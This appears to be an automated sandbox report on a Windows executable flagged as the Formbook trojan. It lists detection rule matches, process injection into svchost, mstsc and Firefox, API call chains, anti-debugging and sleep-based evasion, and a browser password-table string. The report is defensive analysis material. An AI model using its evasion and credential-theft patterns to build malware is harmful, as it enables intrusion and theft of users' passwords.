            Source: 00000003.00000002.4144729578.00000000042E0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000005.00000002.4147103044.0000000004CD0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000003.00000002.4143200808.0000000002640000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000001.00000002.1783204016.0000000003A00000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000002.00000002.4144609194.0000000002590000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: classification engine | Classification label: mal100.troj.spyw.evad.winEXE@7/5@17/12
            Source: C:\Users\user\Desktop\DOC092024-0431202229487.exe | Code function: 0_2_0075D712 GetLastError,FormatMessageW
            Source: C:\Users\user\Desktop\DOC092024-0431202229487.exe | Code function: 0_2_0074B8B0 AdjustTokenPrivileges,CloseHandle
            Source: C:\Users\user\Desktop\DOC092024-0431202229487.exe | Code function: 0_2_0074BEC3 LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError
            Source: C:\Users\user\Desktop\DOC092024-0431202229487.exe | Code function: 0_2_0075EA85 SetErrorMode,GetDiskFreeSpaceExW,SetErrorMode
            Source: C:\Users\user\Desktop\DOC092024-0431202229487.exe | Code function: 0_2_00756F5B CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,__wsplitpath,_wcscat,CloseHandle
            Source: C:\Users\user\Desktop\DOC092024-0431202229487.exe | Code function: 0_2_00751050 CoCreateInstance,SetErrorMode,GetProcAddress,SetErrorMode
            Source: C:\Users\user\Desktop\DOC092024-0431202229487.exe | Code function: 0_2_007131F2 CreateStreamOnHGlobal,FindResourceExW,LoadResource,SizeofResource,LockResource
            Source: C:\Users\user\Desktop\DOC092024-0431202229487.exe | File created: C:\Users\user\AppData\Local\Temp\aut2195.tmp
            Source: C:\Users\user\Desktop\DOC092024-0431202229487.exe | File read: C:\Users\desktop.ini
            Source: C:\Users\user\Desktop\DOC092024-0431202229487.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
            Source: mstsc.exe, 00000003.00000003.1964297802.0000000002865000.00000004.00000020.00020000.00000000.sdmp, mstsc.exe, 00000003.00000003.1964406091.0000000002886000.00000004.00000020.00020000.00000000.sdmp, mstsc.exe, 00000003.00000002.4143406843.0000000002886000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
            Source: DOC092024-0431202229487.exe | ReversingLabs: Detection: 23%
            Source: DOC092024-0431202229487.exe | Virustotal: Detection: 29%
            Source: unknown | Process created: C:\Users\user\Desktop\DOC092024-0431202229487.exe "C:\Users\user\Desktop\DOC092024-0431202229487.exe"
            Source: C:\Users\user\Desktop\DOC092024-0431202229487.exe | Process created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\DOC092024-0431202229487.exe"
            Source: C:\Program Files (x86)\BMiBqafLHjzkobRiuPCIhaDFMyZMzcumuqkxLIIwKxCuVzBYyRmbudyDyFjmM\NZuQxWwOkTbZ.exe | Process created: C:\Windows\SysWOW64\mstsc.exe "C:\Windows\SysWOW64\mstsc.exe"
            Source: C:\Windows\SysWOW64\mstsc.exe | Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
            Source: C:\Users\user\Desktop\DOC092024-0431202229487.exe | Process created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\DOC092024-0431202229487.exe"
            Source: C:\Program Files (x86)\BMiBqafLHjzkobRiuPCIhaDFMyZMzcumuqkxLIIwKxCuVzBYyRmbudyDyFjmM\NZuQxWwOkTbZ.exe | Process created: C:\Windows\SysWOW64\mstsc.exe "C:\Windows\SysWOW64\mstsc.exe"
            Source: C:\Windows\SysWOW64\mstsc.exe | Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
            Source: C:\Users\user\Desktop\DOC092024-0431202229487.exe | Section loaded: apphelp.dll
            Source: C:\Users\user\Desktop\DOC092024-0431202229487.exe | Section loaded: iphlpapi.dll
            Source: C:\Users\user\Desktop\DOC092024-0431202229487.exe | Section loaded: mpr.dll
            Source: C:\Users\user\Desktop\DOC092024-0431202229487.exe | Section loaded: userenv.dll
            Source: C:\Users\user\Desktop\DOC092024-0431202229487.exe | Section loaded: uxtheme.dll
            Source: C:\Users\user\Desktop\DOC092024-0431202229487.exe | Section loaded: version.dll
            Source: C:\Users\user\Desktop\DOC092024-0431202229487.exe | Section loaded: wininet.dll
            Source: C:\Users\user\Desktop\DOC092024-0431202229487.exe | Section loaded: winmm.dll
            Source: C:\Users\user\Desktop\DOC092024-0431202229487.exe | Section loaded: wsock32.dll
            Source: C:\Users\user\Desktop\DOC092024-0431202229487.exe | Section loaded: kernel.appcore.dll
            Source: C:\Users\user\Desktop\DOC092024-0431202229487.exe | Section loaded: windows.storage.dll
            Source: C:\Users\user\Desktop\DOC092024-0431202229487.exe | Section loaded: wldp.dll
            Source: C:\Users\user\Desktop\DOC092024-0431202229487.exe | Section loaded: propsys.dll
            Source: C:\Users\user\Desktop\DOC092024-0431202229487.exe | Section loaded: ntmarta.dll
            Source: C:\Users\user\Desktop\DOC092024-0431202229487.exe | Section loaded: scrrun.dll
            Source: C:\Users\user\Desktop\DOC092024-0431202229487.exe | Section loaded: sxs.dll
            Source: C:\Windows\SysWOW64\mstsc.exe | Section loaded: winhttp.dll
            Source: C:\Windows\SysWOW64\mstsc.exe | Section loaded: credui.dll
            Source: C:\Windows\SysWOW64\mstsc.exe | Section loaded: secur32.dll
            Source: C:\Windows\SysWOW64\mstsc.exe | Section loaded: cryptui.dll
            Source: C:\Windows\SysWOW64\mstsc.exe | Section loaded: wininet.dll
            Source: C:\Windows\SysWOW64\mstsc.exe | Section loaded: version.dll
            Source: C:\Windows\SysWOW64\mstsc.exe | Section loaded: netapi32.dll
            Source: C:\Windows\SysWOW64\mstsc.exe | Section loaded: winmm.dll
            Source: C:\Windows\SysWOW64\mstsc.exe | Section loaded: ktmw32.dll
            Source: C:\Windows\SysWOW64\mstsc.exe | Section loaded: iphlpapi.dll
            Source: C:\Windows\SysWOW64\mstsc.exe | Section loaded: cryptbase.dll
            Source: C:\Windows\SysWOW64\mstsc.exe | Section loaded: sspicli.dll
            Source: C:\Windows\SysWOW64\mstsc.exe | Section loaded: netutils.dll
            Source: C:\Windows\SysWOW64\mstsc.exe | Section loaded: wkscli.dll
            Source: C:\Windows\SysWOW64\mstsc.exe | Section loaded: kernel.appcore.dll
            Source: C:\Windows\SysWOW64\mstsc.exe | Section loaded: uxtheme.dll
            Source: C:\Windows\SysWOW64\mstsc.exe | Section loaded: ieframe.dll
            Source: C:\Windows\SysWOW64\mstsc.exe | Section loaded: iertutil.dll
            Source: C:\Windows\SysWOW64\mstsc.exe | Section loaded: userenv.dll
            Source: C:\Windows\SysWOW64\mstsc.exe | Section loaded: windows.storage.dll
            Source: C:\Windows\SysWOW64\mstsc.exe | Section loaded: wldp.dll
            Source: C:\Windows\SysWOW64\mstsc.exe | Section loaded: profapi.dll
            Source: C:\Windows\SysWOW64\mstsc.exe | Section loaded: mlang.dll
            Source: C:\Windows\SysWOW64\mstsc.exe | Section loaded: propsys.dll
            Source: C:\Windows\SysWOW64\mstsc.exe | Section loaded: winsqlite3.dll
            Source: C:\Windows\SysWOW64\mstsc.exe | Section loaded: vaultcli.dll
            Source: C:\Windows\SysWOW64\mstsc.exe | Section loaded: wintypes.dll
            Source: C:\Windows\SysWOW64\mstsc.exe | Section loaded: dpapi.dll
            Source: C:\Program Files (x86)\BMiBqafLHjzkobRiuPCIhaDFMyZMzcumuqkxLIIwKxCuVzBYyRmbudyDyFjmM\NZuQxWwOkTbZ.exe | Section loaded: wininet.dll
            Source: C:\Program Files (x86)\BMiBqafLHjzkobRiuPCIhaDFMyZMzcumuqkxLIIwKxCuVzBYyRmbudyDyFjmM\NZuQxWwOkTbZ.exe | Section loaded: mswsock.dll
            Source: C:\Program Files (x86)\BMiBqafLHjzkobRiuPCIhaDFMyZMzcumuqkxLIIwKxCuVzBYyRmbudyDyFjmM\NZuQxWwOkTbZ.exe | Section loaded: dnsapi.dll
            Source: C:\Program Files (x86)\BMiBqafLHjzkobRiuPCIhaDFMyZMzcumuqkxLIIwKxCuVzBYyRmbudyDyFjmM\NZuQxWwOkTbZ.exe | Section loaded: iphlpapi.dll
            Source: C:\Program Files (x86)\BMiBqafLHjzkobRiuPCIhaDFMyZMzcumuqkxLIIwKxCuVzBYyRmbudyDyFjmM\NZuQxWwOkTbZ.exe | Section loaded: fwpuclnt.dll
            Source: C:\Program Files (x86)\BMiBqafLHjzkobRiuPCIhaDFMyZMzcumuqkxLIIwKxCuVzBYyRmbudyDyFjmM\NZuQxWwOkTbZ.exe | Section loaded: rasadhlp.dll
            Source: C:\Users\user\Desktop\DOC092024-0431202229487.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32
            Source: Window Recorder | Window detected: More than 3 window changes detected
            Source: C:\Windows\SysWOW64\mstsc.exe | Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\
            Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: NZuQxWwOkTbZ.exe, 00000002.00000002.4143605796.000000000047E000.00000002.00000001.01000000.00000004.sdmp, NZuQxWwOkTbZ.exe, 00000005.00000002.4143319289.000000000047E000.00000002.00000001.01000000.00000004.sdmp
            Source: Binary string: wntdll.pdbUGP source: DOC092024-0431202229487.exe, 00000000.00000003.1689587118.0000000004F70000.00000004.00001000.00020000.00000000.sdmp, DOC092024-0431202229487.exe, 00000000.00000003.1689806543.0000000004DD0000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.1696144266.0000000003100000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.1782791889.000000000349E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.1782791889.0000000003300000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.1693222050.0000000002F00000.00000004.00000020.00020000.00000000.sdmp, mstsc.exe, 00000003.00000002.4144953095.00000000046BE000.00000040.00001000.00020000.00000000.sdmp, mstsc.exe, 00000003.00000002.4144953095.0000000004520000.00000040.00001000.00020000.00000000.sdmp, mstsc.exe, 00000003.00000003.1787130944.00000000041CD000.00000004.00000020.00020000.00000000.sdmp, mstsc.exe, 00000003.00000003.1789604847.000000000437A000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: wntdll.pdb source: DOC092024-0431202229487.exe, 00000000.00000003.1689587118.0000000004F70000.00000004.00001000.00020000.00000000.sdmp, DOC092024-0431202229487.exe, 00000000.00000003.1689806543.0000000004DD0000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, svchost.exe, 00000001.00000003.1696144266.0000000003100000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.1782791889.000000000349E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.1782791889.0000000003300000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.1693222050.0000000002F00000.00000004.00000020.00020000.00000000.sdmp, mstsc.exe, mstsc.exe, 00000003.00000002.4144953095.00000000046BE000.00000040.00001000.00020000.00000000.sdmp, mstsc.exe, 00000003.00000002.4144953095.0000000004520000.00000040.00001000.00020000.00000000.sdmp, mstsc.exe, 00000003.00000003.1787130944.00000000041CD000.00000004.00000020.00020000.00000000.sdmp, mstsc.exe, 00000003.00000003.1789604847.000000000437A000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: mstsc.pdbGCTL source: svchost.exe, 00000001.00000003.1751655428.0000000006D00000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.1751502120.0000000006B00000.00000004.00000020.00020000.00000000.sdmp, NZuQxWwOkTbZ.exe, 00000002.00000003.1725911829.0000000004047000.00000004.00000001.00020000.00000000.sdmp, NZuQxWwOkTbZ.exe, 00000002.00000003.1726302794.000000000418E000.00000004.00000001.00020000.00000000.sdmp
            Source: Binary string: svchost.pdb source: mstsc.exe, 00000003.00000002.4143406843.0000000002811000.00000004.00000020.00020000.00000000.sdmp, mstsc.exe, 00000003.00000002.4145420454.0000000004B4C000.00000004.10000000.00040000.00000000.sdmp, NZuQxWwOkTbZ.exe, 00000005.00000000.1855702857.000000000289C000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000008.00000002.2074422264.000000001DF4C000.00000004.80000000.00040000.00000000.sdmp
            Source: Binary string: mstsc.pdb source: svchost.exe, 00000001.00000003.1751655428.0000000006D00000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.1751502120.0000000006B00000.00000004.00000020.00020000.00000000.sdmp, NZuQxWwOkTbZ.exe, 00000002.00000003.1725911829.0000000004047000.00000004.00000001.00020000.00000000.sdmp, NZuQxWwOkTbZ.exe, 00000002.00000003.1726302794.000000000418E000.00000004.00000001.00020000.00000000.sdmp
            Source: Binary string: svchost.pdbUGP source: mstsc.exe, 00000003.00000002.4143406843.0000000002811000.00000004.00000020.00020000.00000000.sdmp, mstsc.exe, 00000003.00000002.4145420454.0000000004B4C000.00000004.10000000.00040000.00000000.sdmp, NZuQxWwOkTbZ.exe, 00000005.00000000.1855702857.000000000289C000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000008.00000002.2074422264.000000001DF4C000.00000004.80000000.00040000.00000000.sdmp
            Source: C:\Users\user\Desktop\DOC092024-0431202229487.exe | Code function: 0_2_0084B090 EntryPoint,LoadLibraryA,GetProcAddress,ExitProcess,VirtualProtect,VirtualProtect,VirtualProtect
            Source: C:\Users\user\Desktop\DOC092024-0431202229487.exe | Code function: 0_2_0077C6CC push esi; ret 0_2_0077C6CE
            Source: C:\Users\user\Desktop\DOC092024-0431202229487.exe | Code function: 0_2_0073CB5D push edi; ret 0_2_0073CB5F
            Source: C:\Users\user\Desktop\DOC092024-0431202229487.exe | Code function: 0_2_0073CC76 push esi; ret 0_2_0073CC78
            Source: C:\Users\user\Desktop\DOC092024-0431202229487.exe | Code function: 0_2_0073CE51 push esi; ret 0_2_0073CE53
            Source: C:\Users\user\Desktop\DOC092024-0431202229487.exe | Code function: 0_2_0073CF3A push edi; ret 0_2_0073CF3C
            Source: C:\Users\user\Desktop\DOC092024-0431202229487.exe | Code function: 0_2_00737795 push ecx; ret 0_2_007377A8
            Source: C:\Users\user\Desktop\DOC092024-0431202229487.exe | Code function: 0_2_0075BB9D push FFFFFF8Bh; iretd 0_2_0075BB9F
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_00404878 push edx; iretd 1_2_00404879
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_004180CC push ss; iretd 1_2_004180D7
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_004021FE push ecx; ret 1_2_004021FF
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_00413A18 push ebx; retf 1_2_00413A2D
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_0041221F push ss; ret 1_2_00412220
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_00413A23 push ebx; retf 1_2_00413A2D
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_00413A2E push ebx; retf 1_2_00413A2D
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_004073CB push esi; ret 1_2_004073CE
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_00403380 push eax; ret 1_2_00403382
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_0040A623 push edi; retf 1_2_0040A62D
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_00418E2B push esi; ret 1_2_00418E2C
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_0041E76A push ebp; retf 1_2_0041E858
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_0041E71E push edx; iretd 1_2_0041E71F
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_0330225F pushad ; ret 1_2_033027F9
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_033027FA pushad ; ret 1_2_033027F9
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_033309AD push ecx; mov dword ptr [esp], ecx 1_2_033309B6
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_0330283D push eax; iretd 1_2_03302858
            Source: C:\Windows\SysWOW64\mstsc.exe | Code function: 3_2_045227FA pushad ; ret 3_2_045227F9
            Source: C:\Windows\SysWOW64\mstsc.exe | Code function: 3_2_0452225F pushad ; ret 3_2_045227F9
            Source: C:\Windows\SysWOW64\mstsc.exe | Code function: 3_2_0452283D push eax; iretd 3_2_04522858
            Source: C:\Windows\SysWOW64\mstsc.exe | Code function: 3_2_045509AD push ecx; mov dword ptr [esp], ecx 3_2_045509B6
            Source: C:\Windows\SysWOW64\mstsc.exe | Code function: 3_2_026618CC push es; iretd 3_2_026618C5
            Source: C:\Windows\SysWOW64\mstsc.exe | Code function: 3_2_02644048 push esi; ret 3_2_0264404B
            Source: C:\Windows\SysWOW64\mstsc.exe | Code function: 3_2_026506A0 push ebx; retf 3_2_026506AA
            Source: initial sample | Static PE information: section name: UPX0
            Source: initial sample | Static PE information: section name: UPX1
            Source: C:\Users\user\Desktop\DOC092024-0431202229487.exe | Code function: 0_2_0072F78E GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput
            Source: C:\Users\user\Desktop\DOC092024-0431202229487.exe | Code function: 0_2_00777F0E IsWindowVisible,IsWindowEnabled,GetForegroundWindow,IsIconic,IsZoomed
            Source: C:\Users\user\Desktop\DOC092024-0431202229487.exeCode function: 0_2_00731E5A __initp_misc_winsig,GetModuleHandleW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,0_2_00731E5A
            Source: C:\Users\user\Desktop\DOC092024-0431202229487.exe | Process information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\mstsc.exe | Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\mstsc.exe | Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\mstsc.exe | Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\mstsc.exe | Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\mstsc.exe | Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX

            Malware Analysis System Evasion

            Source: C:\Users\user\Desktop\DOC092024-0431202229487.exeAPI/Special instruction interceptor: Address: 4D73244
            Source: C:\Windows\SysWOW64\mstsc.exeAPI/Special instruction interceptor: Address: 7FFE2220D324
            Source: C:\Windows\SysWOW64\mstsc.exeAPI/Special instruction interceptor: Address: 7FFE2220D7E4
            Source: C:\Windows\SysWOW64\mstsc.exeAPI/Special instruction interceptor: Address: 7FFE2220D944
            Source: C:\Windows\SysWOW64\mstsc.exeAPI/Special instruction interceptor: Address: 7FFE2220D504
            Source: C:\Windows\SysWOW64\mstsc.exeAPI/Special instruction interceptor: Address: 7FFE2220D544
            Source: C:\Windows\SysWOW64\mstsc.exeAPI/Special instruction interceptor: Address: 7FFE2220D1E4
            Source: C:\Windows\SysWOW64\mstsc.exeAPI/Special instruction interceptor: Address: 7FFE22210154
            Source: C:\Windows\SysWOW64\mstsc.exeAPI/Special instruction interceptor: Address: 7FFE2220DA44
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0337096E rdtsc 1_2_0337096E
            Source: C:\Windows\SysWOW64\mstsc.exeWindow / User API: threadDelayed 9843Jump to behavior
            Source: C:\Users\user\Desktop\DOC092024-0431202229487.exeEvaded block: after key decisiongraph_0-103724
            Source: C:\Users\user\Desktop\DOC092024-0431202229487.exeAPI coverage: 5.1 %
            Source: C:\Windows\SysWOW64\svchost.exeAPI coverage: 0.7 %
            Source: C:\Windows\SysWOW64\mstsc.exeAPI coverage: 2.6 %
            Source: C:\Windows\SysWOW64\mstsc.exe TID: 7088Thread sleep count: 128 > 30Jump to behavior
            Source: C:\Windows\SysWOW64\mstsc.exe TID: 7088Thread sleep time: -256000s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\mstsc.exe TID: 7088Thread sleep count: 9843 > 30Jump to behavior
            Source: C:\Windows\SysWOW64\mstsc.exe TID: 7088Thread sleep time: -19686000s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\BMiBqafLHjzkobRiuPCIhaDFMyZMzcumuqkxLIIwKxCuVzBYyRmbudyDyFjmM\NZuQxWwOkTbZ.exe TID: 1260Thread sleep time: -90000s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\BMiBqafLHjzkobRiuPCIhaDFMyZMzcumuqkxLIIwKxCuVzBYyRmbudyDyFjmM\NZuQxWwOkTbZ.exe TID: 1260Thread sleep count: 45 > 30Jump to behavior
            Source: C:\Program Files (x86)\BMiBqafLHjzkobRiuPCIhaDFMyZMzcumuqkxLIIwKxCuVzBYyRmbudyDyFjmM\NZuQxWwOkTbZ.exe TID: 1260Thread sleep time: -67500s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\BMiBqafLHjzkobRiuPCIhaDFMyZMzcumuqkxLIIwKxCuVzBYyRmbudyDyFjmM\NZuQxWwOkTbZ.exe TID: 1260Thread sleep count: 45 > 30Jump to behavior
            Source: C:\Program Files (x86)\BMiBqafLHjzkobRiuPCIhaDFMyZMzcumuqkxLIIwKxCuVzBYyRmbudyDyFjmM\NZuQxWwOkTbZ.exe TID: 1260Thread sleep time: -45000s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\mstsc.exeLast function: Thread delayed
            Source: C:\Windows\SysWOW64\mstsc.exeLast function: Thread delayed
            Source: C:\Users\user\Desktop\DOC092024-0431202229487.exe | Code function: 0_2_0072DD92 GetFileAttributesW,FindFirstFileW,FindClose
            Source: C:\Users\user\Desktop\DOC092024-0431202229487.exe | Code function: 0_2_00762044 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose
            Source: C:\Users\user\Desktop\DOC092024-0431202229487.exe | Code function: 0_2_0076219F SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose
            Source: C:\Users\user\Desktop\DOC092024-0431202229487.exe | Code function: 0_2_007624A9 FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose
            Source: C:\Users\user\Desktop\DOC092024-0431202229487.exe | Code function: 0_2_00756B3F _wcscat,_wcscat,__wsplitpath,FindFirstFileW,_wcscpy,_wcscat,_wcscat,lstrcmpiW,DeleteFileW,MoveFileW,MoveFileW,CopyFileW,DeleteFileW,CopyFileW,FindNextFileW,FindClose,FindClose
            Source: C:\Users\user\Desktop\DOC092024-0431202229487.exe | Code function: 0_2_00756E4A _wcscat,__wsplitpath,FindFirstFileW,_wcscpy,_wcscat,_wcscat,DeleteFileW,FindNextFileW,FindClose
            Source: C:\Users\user\Desktop\DOC092024-0431202229487.exe | Code function: 0_2_0075F350 FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose
            Source: C:\Users\user\Desktop\DOC092024-0431202229487.exe | Code function: 0_2_0075FD47 FindFirstFileW,FindClose
            Source: C:\Users\user\Desktop\DOC092024-0431202229487.exe | Code function: 0_2_0075FDD2 FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf
            Source: C:\Windows\SysWOW64\mstsc.exe | Code function: 3_2_0265C460 FindFirstFileW,FindNextFileW,FindClose
            Source: C:\Users\user\Desktop\DOC092024-0431202229487.exe | Code function: 0_2_0072E47B GetVersionExW,GetCurrentProcess,FreeLibrary,GetNativeSystemInfo,FreeLibrary,FreeLibrary,GetSystemInfo,GetSystemInfo
            Source: mstsc.exe, 00000003.00000002.4143406843.0000000002811000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllS
            Source: NZuQxWwOkTbZ.exe, 00000005.00000002.4143851354.000000000084F000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllT
            Source: firefox.exe, 00000008.00000002.2076313522.00000271DDEBC000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllSS
            Source: C:\Users\user\Desktop\DOC092024-0431202229487.exe | API call chain: ExitProcess graph end node (graph_0-103518)
            Source: C:\Windows\SysWOW64\svchost.exe | Process information queried: ProcessInformation
            Source: C:\Windows\SysWOW64\svchost.exe | Process queried: DebugPort
            Source: C:\Windows\SysWOW64\mstsc.exe | Process queried: DebugPort
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_0337096E rdtsc
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_004176F3 LdrLoadDll
            Source: C:\Users\user\Desktop\DOC092024-0431202229487.exe | Code function: 0_2_0076703C BlockInput
            Source: C:\Users\user\Desktop\DOC092024-0431202229487.exe | Code function: 0_2_0071374E GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetModuleFileNameW,GetForegroundWindow,ShellExecuteW
